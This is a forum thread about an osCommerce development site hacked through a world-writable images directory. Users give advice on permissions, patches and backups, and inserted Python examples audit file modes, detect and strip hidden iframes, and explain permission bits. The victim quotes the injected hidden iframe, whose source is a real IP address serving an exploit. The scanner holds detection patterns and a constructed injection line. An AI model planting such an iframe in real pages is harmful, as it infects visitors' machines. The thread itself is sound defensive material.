
osCommerce


Site Hacked! now infecting other machines!


jamiedia


Hello,

I have been developing a site for a while. It's my first site and there is still a lot to do (any tips, tricks, pointers or advice greatly appreciated). I was working on the site yesterday and I noticed it had been hacked by some Iranian people. There was an HTML file in my images directory and I wasn't happy about it. This didn't cause too much of a problem; I deleted it and checked other sites I have set up through the same hosting, and the same had happened on others I have done. Getting a bit worried, I researched what had happened and contacted support, who told me a problem with cPanel had left sites vulnerable to attack and they were working on it.

I deleted the files only to find that when I went to the category pages McAfee shouted at me and said something along the lines of "Trojan detected js/exploit-BO.gen" (the name is from memory but it's very close), so I went into the source and found a cheeky iframe had been put into the source directly after the opening body. I find this incredibly annoying, partly because it is in development, it is not live and the site clearly states that, partly because it's a virus and I have had to take it down, and partly because nobody stands to gain anything. What's the point? It's just giving an honest guy more work.

Since this has happened it seems to have been attacked again (the iframe is now different but with the same outcome). Now the index is also affected, so that's pretty much the entire site.

My problem is that I don't know where to look to edit the code. I am new to osC and I have looked everywhere I can think of. Support said it was a problem with cPanel, but I must be able to remove the malicious source and I don't know where to look.

Has anyone else had a problem like this, and what should I do to try and combat it? For reference, here is the code leading up to the iframe in the index. Hopefully somebody with a bit more experience will recognise it; I don't even know if the JavaScript is supposed to be there. I tried removing it but with no luck.

(Not certain on the forum's protocols, so I cautiously added the ++.)

 

<title here>
<!-- start get_javascript(applicationtop2header) //-->

<!-- end get_javascript(applicationtop2header) //-->
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body><i++frame style="visibility: hidden; width:0px; height:0px; border:0px" src="http://72.232.51.10/~weebler/test.html"></++iframe>
<table width="760" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<rest of page here>

Any help would be greatly appreciated. I don't want to have to start from scratch.

Thanks in advance


The images folder is probably 777, which is why they can upload files to it. It should be 777 ONLY when you actually need it to be; at any other time it should be 755.

For the other things, you probably don't have the latest fixes installed; they are available from the download section (under the Solutions tab at the top of the forum page). Make sure your files are 644 and directories are 755. NO FILES or DIRECTORIES should be 777.

You can also use something like EasyPHP to do your work offline and then upload your finished site. Also, the Site Monitor contribution is a wonderful addition that will tell you which files have been added or altered.

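Added example (not from this thread and not part of osCommerce or the Site Monitor contribution): a small script that does what the reply above recommends, in a checkable way. It lists every entry under a document root that "other" can write to, normalises everything to 644 for files and 755 for directories, and keeps a SHA-256 baseline so that files added, removed or altered since the last check are reported, which is the kind of change Site Monitor flags. Run it over SSH on the host or against a local copy of the site. The sample tree built by make_sample_site() and the TEST-NET address in it are constructed for this example.

```python
# Added example (not from the thread or from osCommerce): audit a document root
# for world-writable entries, normalise modes to 644/755, and keep a SHA-256
# baseline so added, removed or altered files show up (what the Site Monitor
# contribution mentioned above reports).  The sample tree is constructed here.
import hashlib
import os
import stat

FILE_MODE = 0o644  # rw-r--r--
DIR_MODE = 0o755   # rwxr-xr-x


def _entries(root):
    """Yield (absolute path, lstat result) for root and everything under it, skipping symlinks."""
    st = os.lstat(root)
    if not stat.S_ISLNK(st.st_mode):
        yield root, st
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if not stat.S_ISLNK(st.st_mode):
                yield p, st


def world_writable(root):
    """Sorted (relative path, octal mode) for every entry that 'other' may write to."""
    hits = []
    for p, st in _entries(root):
        mode = stat.S_IMODE(st.st_mode)
        if mode & stat.S_IWOTH:
            hits.append((os.path.relpath(p, root), format(mode, 'o')))
    return sorted(hits)


def normalise_modes(root):
    """chmod directories to 755 and files to 644; return how many entries changed."""
    changed = 0
    for p, st in _entries(root):
        want = DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE
        if stat.S_IMODE(st.st_mode) != want:
            os.chmod(p, want)
            changed += 1
    return changed


def snapshot(root):
    """Map relative path -> SHA-256 hex digest for every regular file."""
    out = {}
    for p, st in _entries(root):
        if not stat.S_ISREG(st.st_mode):
            continue
        h = hashlib.sha256()
        with open(p, 'rb') as fh:
            for chunk in iter(lambda: fh.read(65536), b''):
                h.update(chunk)
        out[os.path.relpath(p, root)] = h.hexdigest()
    return out


def compare(baseline, current):
    """Sorted lists of paths added, removed and altered since the baseline was taken."""
    return {
        'added': sorted(set(current) - set(baseline)),
        'removed': sorted(set(baseline) - set(current)),
        'altered': sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def make_sample_site(root):
    """Constructed sample with the symptoms from the thread: a 777 images
    directory holding a planted test.html, next to a correctly permissioned catalog."""
    os.makedirs(os.path.join(root, 'images'))
    os.makedirs(os.path.join(root, 'includes'))
    files = {
        'index.php': '<?php require("includes/application_top.php"); ?>\n<body>\n',
        'includes/configure.php': "<?php define('HTTP_SERVER', 'http://www.example.com'); ?>\n",
        'images/test.html': '<html>planted</html>\n',
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), 'w') as fh:
            fh.write(content)
        os.chmod(os.path.join(root, rel), FILE_MODE)
    os.chmod(os.path.join(root, 'includes'), DIR_MODE)
    os.chmod(os.path.join(root, 'images'), 0o777)
    os.chmod(os.path.join(root, 'images', 'test.html'), 0o666)


if __name__ == '__main__':
    import tempfile
    root = tempfile.mkdtemp()
    make_sample_site(root)
    print('world-writable:', world_writable(root))
    baseline = snapshot(root)
    print('entries changed:', normalise_modes(root))
    with open(os.path.join(root, 'index.php'), 'a') as fh:
        fh.write('<iframe src="http://192.0.2.10/x.html"></iframe>\n')  # constructed injection
    print(compare(baseline, snapshot(root)))
```

Take the baseline right after a clean upload and store it off the server; a baseline kept in the document root can be edited by whoever edited the pages. Symlinks are skipped on purpose so a link planted in a writable directory cannot make the script chmod or hash something outside the site.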

Also, it would be worth stripping any 'osCommerce' text and version numbers, as this indicates what software you are using, and if they were truly malicious they would use this info to gain entry.

However, your ISP/hosting provider is entirely responsible for this; the servers should have IDS/IPS on them and anti-virus protection. I would also be inclined to check your contract with them and see what security measures they have in place. If it were a live site, then there could have been serious repercussions!!

Think about changing your hosting company too. :)

----------------------------------------

Minxy :)

 

"Keep plodding on to achieve your dreams"


I started my store on SiteGround last week. I did a bunch of work in it and it got hacked already. Someone put in a fake order (still sample data, for gosh sake) and deleted my configure.php files.

They were marked read-only, too... Not sure how they did that. They also reset some of the items in my database back to original settings. I know it was OK before.

I'm new to osC and to MySQL, but I've been using SQL Server for years and I'm a 20-year IT veteran and a 5-year web developer, so I didn't consider myself a total noob, but apparently I don't know as much as I should about securing Unix and PHP/MySQL.

 

$#@%!


By the way, I note that you said:

> Getting a bit worried, I researched what had happened and contacted support, who told me a problem with cPanel had left sites vulnerable to attack and they were working on it.

but all I got was the same lame response I usually get, that being that my scripts must have been out of date (but I used their installation, which I had hoped would be somewhat current). I learned a lesson today, and thankfully my site is developed on my laptop and only published to SiteGround, so I didn't lose everything, and now I get to learn how to export/import my database.

You were right; stupid me set the images folder to 777. I have now changed it to 755 and I am going through the rest to make sure they are all correct and all patches are up to date. The sites are hosted with hostgator.com. I've never had any problem with them in the past, but this is my first osC project so I guess I have a lot to learn.

I don't understand how the iframe got into the source. Does anyone know? I searched for hours through all the relevant files and I couldn't find it hardcoded anywhere. Which file would it be that writes the iframe there?

 

Thanks for the help everyone I was getting a bit worried.

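Added example, not from this thread and not part of osCommerce, for the question above about which file writes the iframe. It assumes that in this osCommerce release each catalog script (index.php, product_info.php and so on) prints its own <body> tag rather than sharing one template, so the injection can sit in any of them and every PHP, HTML and JS file under the document root has to be searched. The script reports every iframe that is hidden by inline style, zero-sized, or whose src points straight at an IP address, and can strip them while keeping a .bak copy for the host's abuse team. The sample pages and the 192.0.2.10 address are constructed for this example.

```python
# Added example (not from the thread or from osCommerce): find and strip the
# hidden iframe the poster found after <body>.  Assumption: every catalog
# script prints its own <body>, so all PHP/HTML/JS files are scanned.
# The sample site and the 192.0.2.10 host are constructed for this example.
import os
import re

IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
# Inline style that hides or zero-sizes the frame, as in the injected tag.
HIDDEN_RE = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none|width\s*:\s*0|height\s*:\s*0',
                       re.IGNORECASE)
# src pointing straight at an IP address rather than a hostname.
RAW_IP_SRC_RE = re.compile(r'src\s*=\s*["\']?https?://\d{1,3}(?:\.\d{1,3}){3}', re.IGNORECASE)
SCAN_EXT = ('.php', '.html', '.htm', '.js', '.tpl')


def suspicious_iframes(text):
    """(line number, opening tag) for every iframe that is hidden, zero-sized or points at a raw IP."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if HIDDEN_RE.search(tag) or RAW_IP_SRC_RE.search(tag):
            hits.append((text.count('\n', 0, m.start()) + 1, tag))
    return hits


def scan_tree(root):
    """Map relative path -> list of (line, tag) for every scanned file with a hit."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXT):
                continue
            p = os.path.join(dirpath, name)
            with open(p, 'r', encoding='utf-8', errors='replace') as fh:
                found = suspicious_iframes(fh.read())
            if found:
                hits[os.path.relpath(p, root)] = found
    return hits


def clean_file(path):
    """Remove every suspicious iframe (and its closing tag) from path, keeping path.bak.
    Returns the number of tags removed."""
    with open(path, 'r', encoding='utf-8', errors='replace') as fh:
        text = fh.read()
    tags = {tag for _, tag in suspicious_iframes(text)}
    if not tags:
        return 0
    with open(path + '.bak', 'w', encoding='utf-8') as fh:
        fh.write(text)
    removed = 0
    for tag in tags:
        text, n = re.subn(re.escape(tag) + r'\s*(?:</iframe\s*>)?', '', text, flags=re.IGNORECASE)
        removed += n
    with open(path, 'w', encoding='utf-8') as fh:
        fh.write(text)
    return removed


# Constructed stand-in for the injected tag, on a TEST-NET address.
INJECTED_TAG = ('<iframe style="visibility: hidden; width:0px; height:0px; border:0px" '
                'src="http://192.0.2.10/~user/test.html"></iframe>')


def write_sample_site(root):
    """Constructed sample: two injected pages, one clean page with a legitimate iframe, one non-scanned file."""
    pages = {
        'index.php': '<html>\n<head><title>Shop</title></head>\n<body>' + INJECTED_TAG
                     + '\n<table>...</table>\n</body></html>\n',
        'product_info.php': '<html>\n<body>' + INJECTED_TAG + '\n</body></html>\n',
        'about.php': '<body>\n<iframe src="https://maps.example.com/embed" width="400" height="300">'
                     '</iframe>\n</body>\n',
        'stylesheet.css': 'body { margin: 0; }\n',
    }
    for name, content in pages.items():
        with open(os.path.join(root, name), 'w', encoding='utf-8') as fh:
            fh.write(content)


if __name__ == '__main__':
    import tempfile
    root = tempfile.mkdtemp()
    write_sample_site(root)
    for rel, found in sorted(scan_tree(root).items()):
        for line, tag in found:
            print(f'{rel}:{line}: {tag}')
        print(f'  removed {clean_file(os.path.join(root, rel))} tag(s), backup in {rel}.bak')
```

Stripping the tag only removes the symptom. If the scan keeps finding it again after a clean-up, the write path (a world-writable directory, a leaked FTP password, or the host-side problem support mentioned) is still open, and the .bak copies and file modification times are what to hand to the host when asking them to look.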

> Also, it would be worth stripping any 'osCommerce' text and version numbers, as this indicates what software you are using, and if they were truly malicious they would use this info to gain entry.
>
> However, your ISP/hosting provider is entirely responsible for this; the servers should have IDS/IPS on them and anti-virus protection. I would also be inclined to check your contract with them and see what security measures they have in place. If it were a live site, then there could have been serious repercussions!!
>
> Think about changing your hosting company too. :)

What do I need to edit in order to do this?


This time, bud, make a copy of your site... that way if it happens again you can just re-upload your backup copy and overwrite any changes they might have made...

If you use Macromedia Dreamweaver it keeps a local copy on your PC... as long as you work on the local version and upload to your host it will always overwrite the files on the host....


A lot of posts refer to patches.

 

Whenever I visit the download link, I only see where I can download the latest version - is there another page to visit with patches?

 

Thank you for any assistance!


> A lot of posts refer to patches.
>
> Whenever I visit the download link, I only see where I can download the latest version - is there another page to visit with patches?
>
> Thank you for any assistance!

This file is part of the version you can download. It has all patches in case you want to manually upgrade an older version.

update_20060817.txt

:-)

Monika

 

addicted to writing code ... can't get enough of databases either, LOL!

 

my toolbox: Textpad - Compare and Merge - phpMyAdmin - WS_FTP - Photoshop - How to search the forum

 

Interactive Media Award July 2007 ~ category E-Commerce

my advice on the forum is for free, PMs where you send me work are considered consultation which I charge for ...


2 weeks later...

OK, thanks for your help everyone. I've been working on it and have got pretty much everything sorted, but because I have set the images folder's write permissions to 755 I get a warning in the admin that says the images directory isn't writeable. As the owner I thought I would be OK with 755. I have tried to change it, but if I set it to 766 none of the images on the site will display. I think this is something to do with the image resize add-on I have used, but I'm not certain. Does anyone know why this is happening? Have I perhaps set something up wrong? Is it possible that I need to edit a config somewhere? I don't want to put it back to 777 for obvious reasons, but I'm not sure what to do about it.

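Added example, not from this thread and not part of osCommerce, that works through the two symptoms in the post above from the directory's mode bits and ownership. Whether the PHP process runs as the FTP owner (suPHP/phpsuexec style hosting) or as the shared Apache user is something only the host can confirm, so the UIDs and GIDs here are hypothetical. With a different user, 755 lets the web server read and serve images but not create files, which is the "not writeable" warning in the admin; 766 grants write but removes the execute (search) bit that "other" needs merely to enter the directory, so none of the images can be served at all. The recommend() function picks the smallest mode that gives the web server both, without handing write to everyone.

```python
# Added example (not from the thread or from osCommerce): what the web-server
# process can do in a directory, from its mode bits and ownership.  Explains
# why 755 gives the "not writeable" warning and 766 makes the images vanish
# when PHP runs as a different user than the directory owner.  UIDs/GIDs are
# hypothetical; confirm with the host which user PHP actually runs as.
import os
import stat


def access_for(mode, owner_uid, owner_gid, uid, gids):
    """(can_enter, can_create) for a directory with this mode and ownership, evaluated
    for a non-root process running as uid with group membership gids."""
    if uid == owner_uid:
        w, x = stat.S_IWUSR, stat.S_IXUSR
    elif owner_gid in gids:
        w, x = stat.S_IWGRP, stat.S_IXGRP
    else:
        w, x = stat.S_IWOTH, stat.S_IXOTH
    can_enter = bool(mode & x)                   # execute on a directory = search/traverse
    can_create = can_enter and bool(mode & w)    # creating a file needs write AND search
    return can_enter, can_create


def diagnose(mode, owner_uid, owner_gid, php_uid, php_gids):
    """Short verdict on the images directory for the given web-server identity."""
    can_enter, can_create = access_for(mode, owner_uid, owner_gid, php_uid, php_gids)
    if not can_enter:
        return 'cannot enter: images in it will not display'
    if not can_create:
        return 'can serve but not write: admin will warn the directory is not writeable'
    return 'can serve and write'


def recommend(owner_uid, owner_gid, php_uid, php_gids):
    """(mode, gid) to apply so the web server can serve and write without 'other' write.
    Tries owner-only write first, then group write via the current group, then group
    write after a chgrp to the web server's primary group (that chgrp needs root or
    membership of that group, so it is usually a request to the host)."""
    if access_for(0o755, owner_uid, owner_gid, php_uid, php_gids) == (True, True):
        return 0o755, owner_gid
    if access_for(0o775, owner_uid, owner_gid, php_uid, php_gids) == (True, True):
        return 0o775, owner_gid
    return 0o775, php_gids[0]


def check_path(path, php_uid, php_gids):
    """Apply access_for() to a real directory's stat() result."""
    st = os.stat(path)
    return access_for(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, php_uid, php_gids)


if __name__ == '__main__':
    OWNER, APACHE = (1001, 1001), (48, [48])   # hypothetical FTP owner and Apache identity
    for mode in (0o755, 0o766, 0o775, 0o777):
        print(f'{mode:o} with PHP as Apache: {diagnose(mode, *OWNER, *APACHE)}')
    print(f'755 with PHP as the owner:  {diagnose(0o755, *OWNER, OWNER[0], [OWNER[1]])}')
    mode, gid = recommend(*OWNER, *APACHE)
    print(f'recommend: chmod {mode:o} and group {gid} on images/')
```

If recommend() comes back with 755, PHP is already running as the owner and the admin warning is coming from something else (a check in the image resize add-on, for instance); if it comes back with a group change, 777 is the only mode the owner can set alone, which is exactly why this is a question for the host rather than a chmod.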
